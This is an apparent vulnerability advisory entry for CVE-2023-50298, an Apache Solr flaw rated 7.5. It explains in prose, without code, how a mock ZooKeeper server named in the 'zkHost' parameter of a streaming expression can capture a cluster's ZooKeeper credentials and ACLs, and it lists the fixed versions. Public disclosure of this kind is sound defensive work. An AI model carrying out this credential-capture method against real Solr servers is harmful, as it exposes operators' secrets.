7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.001 Low
EPSS
Percentile
19.4%
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in
Apache Solr.This issue affects Apache Solr: from 6.0.0 through 8.11.2, from
9.0.0 before 9.4.1. Solr Streaming Expressions allows users to extract data
from other Solr Clouds, using a “zkHost” parameter. When original SolrCloud
is setup to use ZooKeeper credentials and ACLs, they will be sent to
whatever “zkHost” the user provides. An attacker could setup a server to
mock ZooKeeper, that accepts ZooKeeper requests with credentials and ACLs
and extracts the sensitive information, then send a streaming expression
using the mock server’s address in “zkHost”. Streaming Expressions are
exposed via the “/streaming” handler, with “read” permissions. Users are
recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue.
From these versions on, only zkHost values that have the same server
address (regardless of chroot), will use the given ZooKeeper credentials
and ACLs when connecting.
launchpad.net/bugs/cve/CVE-2023-50298
nvd.nist.gov/vuln/detail/CVE-2023-50298
security-tracker.debian.org/tracker/CVE-2023-50298
solr.apache.org/security.html#cve-2023-50298-apache-solr-can-expose-zookeeper-credentials-via-streaming-expressions
www.cve.org/CVERecord?id=CVE-2023-50298
www.openwall.com/lists/oss-security/2024/02/09/2